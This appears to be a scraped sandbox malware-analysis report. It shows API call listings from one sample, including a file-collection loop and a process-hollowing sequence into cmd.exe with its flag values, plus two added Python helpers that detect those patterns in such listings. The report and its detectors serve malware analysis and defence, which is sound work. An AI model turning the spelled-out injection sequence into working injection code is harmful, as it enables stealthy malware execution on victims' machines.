                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
• String ID: %s\%s$%s\%s$%s\*
• API String ID: 2178766154-445461498
• Opcode ID: 27735559bfb48da9287d526a8cd59a7ae3fc043cea796b4c773b8c6c6164f3d1
• Instruction ID: 64275d2e5cf7c8d224275fc1dacaaae6d6bbd306d4b58079a7bad6c2dccd003f
• Opcode Fuzzy Hash: 27735559bfb48da9287d526a8cd59a7ae3fc043cea796b4c773b8c6c6164f3d1
• Instruction Fuzzy Hash: B281137290022D9BCF62FB64EC45ADD7BB8FB18304F0585E6E549A3111DF35AA898F90
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00195B72
• HeapAlloc.KERNEL32(00000000), ref: 00195B79
• wsprintfA.USER32 ref: 00195B92
• FindFirstFileA.KERNEL32(?,?), ref: 00195BA9
• StrCmpCA.SHLWAPI(?,001B6AA0), ref: 00195BCA
• StrCmpCA.SHLWAPI(?,001B6AA4), ref: 00195BE4
• CopyFileA.KERNEL32(?,?,00000001), ref: 00195CC8
  • Part of subcall function 0019584D: _memset.LIBCMT ref: 00195885
  • Part of subcall function 0019584D: _memset.LIBCMT ref: 00195896
  • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 001958C1
  • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 001958DF
  • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 001958F3
  • Part of subcall function 0019584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00195906
  • Part of subcall function 0019584D: StrStrA.SHLWAPI(00000000), ref: 001959AA
• DeleteFileA.KERNEL32(?), ref: 00195CEB
• wsprintfA.USER32 ref: 00195C0B
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• FindNextFileA.KERNEL32(?,?), ref: 00195D1A
• FindClose.KERNEL32(?), ref: 00195D2E
• lstrcatA.KERNEL32(?), ref: 00195D5C
• lstrcatA.KERNEL32(?), ref: 00195D6F
• lstrlenA.KERNEL32(?), ref: 00195D7B
• lstrlenA.KERNEL32(?), ref: 00195D98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
• String ID: %s\%s$%s\*
• API String ID: 2636950706-2848263008
• Opcode ID: 7b93b915f506e5e8db5197b8e6ac540971ff82042fa478118d8cb70e9753c1c3
• Instruction ID: eef1073b2e1d1b3556a9e5781e25f01a1753bfa736cfb164944db1ac8dec6378
• Opcode Fuzzy Hash: 7b93b915f506e5e8db5197b8e6ac540971ff82042fa478118d8cb70e9753c1c3
• Instruction Fuzzy Hash: 28713AB19002289BDF22FB60EC49ADD7BBDAF19300F0004E6E609A7151EB71AF85CF55
APIs
• _memset.LIBCMT ref: 0018F551
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,001B65A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0018F575
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0018F587
• GetThreadContext.KERNEL32(?,00000000), ref: 0018F599
• ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0018F5B7
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0018F5CD
• ResumeThread.KERNEL32(?), ref: 0018F5DD
• WriteProcessMemory.KERNEL32(?,00000000,00192DA1,?,00000000), ref: 0018F5FC
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0018F632
• WriteProcessMemory.KERNEL32(?,?,D6D9E8F4,00000004,00000000), ref: 0018F659
• SetThreadContext.KERNEL32(?,00000000), ref: 0018F66B
• ResumeThread.KERNEL32(?), ref: 0018F674
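Added example, not code from Joe Sandbox or from the analysed sample: a small Python triage helper that parses API bullet lines in the form this report renders them and applies two heuristics, one for the directory-walk listing further up (FindFirstFileA, CopyFileA, DeleteFileA, FindNextFileA between the two wsprintfA calls) and one for the injection listing immediately above. In that listing the sixth CreateProcessA argument, 00000004, is CREATE_SUSPENDED, and the VirtualAllocEx arguments 00003000 and 00000040 are MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE; together with the three WriteProcessMemory calls, SetThreadContext and the final ResumeThread this is the process-hollowing sequence into cmd.exe that the "Contains functionality to inject code into remote processes" signature summarises. The helper derives that verdict from the listing text itself. The argument positions, the heuristic names and the two embedded sample listings (copied from this page, the second abridged) are this example's own choices.

```python
"""Triage helper for the per-function "APIs" listings of a Joe Sandbox report.

Added example, not code from Joe Sandbox or from the analysed sample: it parses
the bullet lines as rendered on this page, restores call order from the "ref:"
addresses and applies two heuristics (a process-hollowing chain; a FindFirstFile/
FindNextFile loop that copies and deletes files). Names are this example's own.
"""
import re
from collections import namedtuple

CREATE_SUSPENDED = 0x4          # CreateProcess dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40   # VirtualAllocEx flProtect value

# "• Api.MOD(args), ref: ADDR", "• Api.MOD ref: ADDR" and "• Part of subcall function ADDR: ..."
_LINE = re.compile(
    r"•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# ref: call-site address; subcall: parent address for "Part of subcall" lines, else None.
Call = namedtuple("Call", "api module args ref subcall")

def parse_api_listing(text):
    """Parse the bullet lines and return the calls sorted by call-site address."""
    calls = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return sorted(calls, key=lambda c: c.ref)

def _hex_arg(call, idx):
    """Argument idx as an int, or 0 when it is missing or unresolved ("?")."""
    try:
        return int(call.args[idx], 16)
    except (IndexError, ValueError):
        return 0

HOLLOW_CHAIN = ["CreateProcess", "GetThreadContext", "VirtualAllocEx",
                "WriteProcessMemory", "SetThreadContext", "ResumeThread"]

def find_process_hollowing(calls):
    """Return details of a hollowing chain found in address order, else None."""
    own = [c for c in calls if c.subcall is None]  # ignore subcall lines
    # dwCreationFlags is the 6th CreateProcess argument (index 5).
    create = next((c for c in own if c.api.startswith("CreateProcess")
                   and _hex_arg(c, 5) & CREATE_SUSPENDED), None)
    if create is None:
        return None
    pos, chain = create.ref, [create.api]
    for step in HOLLOW_CHAIN[1:]:
        nxt = next((c for c in own if c.api == step and c.ref > pos), None)
        if nxt is None:
            return None
        pos, chain = nxt.ref, chain + [step]
    # flProtect is the 5th VirtualAllocEx argument (index 4); 0x40 is RWX.
    rwx = any(c.api == "VirtualAllocEx" and _hex_arg(c, 4) == PAGE_EXECUTE_READWRITE
              for c in own)
    return {"target": create.args[0], "rwx_alloc": rwx, "chain": chain,
            "writes": sum(c.api == "WriteProcessMemory" for c in own)}

def find_file_harvest_loop(calls):
    """Summarise what a FindFirstFile..FindNextFile loop body does to files."""
    own = [c for c in calls if c.subcall is None]
    first = next((c for c in own if c.api.startswith("FindFirstFile")), None)
    if first is None:
        return None
    nxt = next((c for c in own if c.api.startswith("FindNextFile")
                and c.ref > first.ref), None)
    if nxt is None:
        return None
    body = sorted({c.api for c in own if first.ref < c.ref < nxt.ref})
    return {"body": body,
            "copies": any(a.startswith("CopyFile") for a in body),
            "deletes": any(a.startswith("DeleteFile") for a in body)}

# Constructed input: the injection-relevant bullets of the listing above, copied as rendered.
HOLLOWING_LISTING = r"""
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,001B65A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0018F575
• GetThreadContext.KERNEL32(?,00000000), ref: 0018F599
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0018F5CD
• ResumeThread.KERNEL32(?), ref: 0018F5DD
• WriteProcessMemory.KERNEL32(?,00000000,00192DA1,?,00000000), ref: 0018F5FC
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0018F632
• WriteProcessMemory.KERNEL32(?,?,D6D9E8F4,00000004,00000000), ref: 0018F659
• SetThreadContext.KERNEL32(?,00000000), ref: 0018F66B
• ResumeThread.KERNEL32(?), ref: 0018F674
"""

# Constructed input: an abridged copy of the directory-walk function's bullets.
HARVEST_LISTING = r"""
• FindFirstFileA.KERNEL32(?,?), ref: 00195BA9
• CopyFileA.KERNEL32(?,?,00000001), ref: 00195CC8
  • Part of subcall function 0019584D: StrStrA.SHLWAPI(00000000), ref: 001959AA
• DeleteFileA.KERNEL32(?), ref: 00195CEB
• wsprintfA.USER32 ref: 00195C0B
• FindNextFileA.KERNEL32(?,?), ref: 00195D1A
"""
```

Sorting on the ref address recovers the order in which the call sites appear in the function body, which the report does not always preserve (DeleteFileA at 00195CEB is listed before wsprintfA at 00195C0B). That linear order is a triage approximation, not control flow: the two ResumeThread calls in the injection function at 0018F5DD and 0018F674 are almost certainly on different branches, so the chain the helper reports should be confirmed against the disassembly or the hcaresult snapshot before it is used as evidence.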
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                        • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                        • API String ID: 3621800378-4087486346
                                                                                                                                                                        • Opcode ID: faeb5a2e586254a92e481e6227a77d26aa02b9ee0358619ee71f877bd898ecaf
                                                                                                                                                                        • Instruction ID: 8b919b3719b59faf734853dca6eea49ede0afbeebc51726baa01c7f34f0dc92c
                                                                                                                                                                        • Opcode Fuzzy Hash: faeb5a2e586254a92e481e6227a77d26aa02b9ee0358619ee71f877bd898ecaf
                                                                                                                                                                        • Instruction Fuzzy Hash: 38413972A00208AFDB11AFA4DC85FEEBBB9FF48745F104069FA05E6161D771AE50CB20
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• FindFirstFileA.KERNEL32(?,?,001BA9AC,001BA9B0,001B69F3,001B69F2,0019794A,?,00000000), ref: 00181FA4
• StrCmpCA.SHLWAPI(?,001BA9B4), ref: 00181FD7
• StrCmpCA.SHLWAPI(?,001BA9B8), ref: 00181FF1
• FindFirstFileA.KERNEL32(?,?,001BA9BC,001BA9C0,?,001BA9C4,001B69F6), ref: 001820DD
• CopyFileA.KERNEL32(?,?,00000001), ref: 001822C3
  • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• DeleteFileA.KERNEL32(?), ref: 00182336
• FindNextFileA.KERNEL32(?,?), ref: 001823A2
• FindClose.KERNEL32(?), ref: 001823B6
• CopyFileA.KERNEL32(?,?,00000001), ref: 001825DC
  • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
  • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
  • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
  • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
  • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
• DeleteFileA.KERNEL32(?), ref: 0018264F
  • Part of subcall function 00196ED9: Sleep.KERNEL32(000003E8,?,?), ref: 00196F40
• FindNextFileA.KERNEL32(?,?), ref: 001826C6
• FindClose.KERNEL32(?), ref: 001826DA
  • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
  • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
  • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00191D67: GetFileAttributesA.KERNEL32(?,?,?,0018DA54,?,?,?), ref: 00191D6E
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
• String ID: \*.*
• API String ID: 1475085387-1173974218
• Opcode ID: dceaaee27b27e60a821e464a2656be3bcc57a4a391a4be84d68cf6ce73012461
• Instruction ID: 9ba41316e8d99338b4e8d5efda3c57e324d62feace6e43f84f12b11b4d2888a3
• Opcode Fuzzy Hash: dceaaee27b27e60a821e464a2656be3bcc57a4a391a4be84d68cf6ce73012461
• Instruction Fuzzy Hash: FC3280319011299BDF22FB24DC46ACDB7B8AF25304F5241E1E558B7162DB70AF8A8F81
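The call lists in this report read as a file-collection loop (FindFirstFileA on a `\*.*` pattern, two StrCmpCA compares on the returned name, CopyFileA/CreateFileA/ReadFile and DeleteFileA per entry, then FindNextFileA and FindClose), and the earlier function's API ID summary (Process/Memory/Thread/Write/Alloc/Context/Resume/Virtual/Create next to the string C:\Windows\System32\cmd.exe) has the shape of process hollowing. The Python below is an added triage example, not code from the report, from Joe Sandbox or from the sample: it parses "APIs" bullets in the format printed on this page and flags those two patterns. The first input is an excerpt of this report's own list; the second is a constructed trace whose API names, argument values and addresses are assumptions derived from the API ID summary, not data from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input 1: the directory-walk function's "APIs" list from this report, trimmed to the
# calls that matter; the "APIs" header stays in to show that non-call lines are skipped.
FILE_WALK_TRACE = r"""
APIs
• wsprintfA.USER32 ref: 001954AA
• FindFirstFileA.KERNEL32(?,?), ref: 001954C1
• StrCmpCA.SHLWAPI(?,001B6A88), ref: 001954E2
• StrCmpCA.SHLWAPI(?,001B6A8C), ref: 001954FC
  • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
  • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
• FindNextFileA.KERNEL32(?,?), ref: 00195663
• FindClose.KERNEL32(?), ref: 00195677
"""
# Constructed input 2: a hypothetical trace, in the same format, of the kind the report's
# Process/Memory/Thread/Write/Alloc/Context/Resume function would produce. The API names,
# argument values and addresses are assumptions made for this example, not report data.
HOLLOWING_TRACE = r"""
• CreateProcessA.KERNEL32(00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00183A10
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00183A4C
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00183A7E
• SetThreadContext.KERNEL32(?,?), ref: 00183AB0
• ResumeThread.KERNEL32(?), ref: 00183AC2
"""

@dataclass
class ApiCall:
    api: str                # "FindFirstFileA"
    module: str             # "KERNEL32"
    args: List[str]         # raw tokens; "?" where the sandbox could not resolve a value
    ref: str                # call-site address as printed in the report
    subcall: Optional[str]  # subroutine address for "Part of subcall function" entries

# One bullet: optional subcall prefix, Api.MODULE, optional (args), then "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod").upper(), args, m.group("ref"), m.group("sub")))
    return calls

def _base(api: str) -> str:
    """Drop the ANSI/Unicode suffix so FindFirstFileA and FindFirstFileW hit the same rule."""
    return api[:-1] if len(api) > 1 and api[-1] in "AW" else api

def _hex(tok: str) -> Optional[int]:
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None  # "?" stays unknown, not 0

COLLECTORS = {"CopyFile", "CreateFile", "ReadFile", "DeleteFile"}
def detect_directory_walk(calls: List[ApiCall]) -> Dict[str, object]:
    """FindFirstFile ... FindNextFile among the function's own calls, with file access in between.
    Subcall entries count as work inside the loop but never as its boundaries."""
    own = [(i, _base(c.api)) for i, c in enumerate(calls) if c.subcall is None]
    firsts = [i for i, n in own if n == "FindFirstFile"]
    nexts = [i for i, n in own if n == "FindNextFile"]
    if not firsts or not nexts or nexts[-1] < firsts[0]:
        return {"match": False}
    first, last_next = firsts[0], nexts[-1]
    # Two string compares straight after FindFirstFile is the usual "." and ".." skip.
    after = [_base(c.api) for c in calls[first + 1:first + 3] if c.subcall is None]
    touched = sorted({_base(c.api) for c in calls[first + 1:last_next]} & COLLECTORS)
    return {
        "match": bool(touched),
        "loop_site": calls[first].ref,
        "skips_dot_entries": after == ["StrCmpC", "StrCmpC"],
        "file_ops_in_loop": touched,
        "closes_handle": any(n == "FindClose" for i, n in own if i > last_next),
    }

HOLLOWING_CHAIN = ["CreateProcess", "VirtualAllocEx", "WriteProcessMemory", "SetThreadContext", "ResumeThread"]
def detect_process_hollowing(calls: List[ApiCall]) -> Dict[str, object]:
    """Ordered chain: create the target, allocate in it, write to it, redirect its thread, resume."""
    names = [_base(c.api) for c in calls]
    pos, sites = -1, []
    for step in HOLLOWING_CHAIN:
        try:
            pos = names.index(step, pos + 1)  # each step must follow the previous one
        except ValueError:
            return {"match": False, "missing": step}
        sites.append(calls[pos].ref)
    # Corroboration: CreateProcess arg 5 (dwCreationFlags) has CREATE_SUSPENDED = 0x4 set, and
    # VirtualAllocEx arg 4 (flProtect) is PAGE_EXECUTE_READWRITE = 0x40.
    suspended = any(_base(c.api) == "CreateProcess" and len(c.args) > 5
                    and bool((_hex(c.args[5]) or 0) & 0x4) for c in calls)
    rwx = any(_base(c.api) == "VirtualAllocEx" and len(c.args) > 4 and _hex(c.args[4]) == 0x40 for c in calls)
    return {"match": True, "sites": sites, "creates_suspended": suspended, "rwx_alloc": rwx}
```

To use it on the other functions in this report, paste their "APIs" bullets into `parse_trace` and run both detectors over the result. The loop detector takes its boundaries only from the function's own calls, because "Part of subcall function" entries belong to other routines; the hollowing detector insists on call order, since the same five APIs in a different order do not describe the technique.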
APIs
• wsprintfA.USER32 ref: 001954AA
• FindFirstFileA.KERNEL32(?,?), ref: 001954C1
• StrCmpCA.SHLWAPI(?,001B6A88), ref: 001954E2
• StrCmpCA.SHLWAPI(?,001B6A8C), ref: 001954FC
• lstrcatA.KERNEL32(?), ref: 0019554D
• lstrcatA.KERNEL32(?), ref: 00195560
• lstrcatA.KERNEL32(?,?), ref: 00195574
• lstrcatA.KERNEL32(?,?), ref: 00195587
• lstrcatA.KERNEL32(?,001B6A90), ref: 00195599
• lstrcatA.KERNEL32(?,?), ref: 001955AD
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
  • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
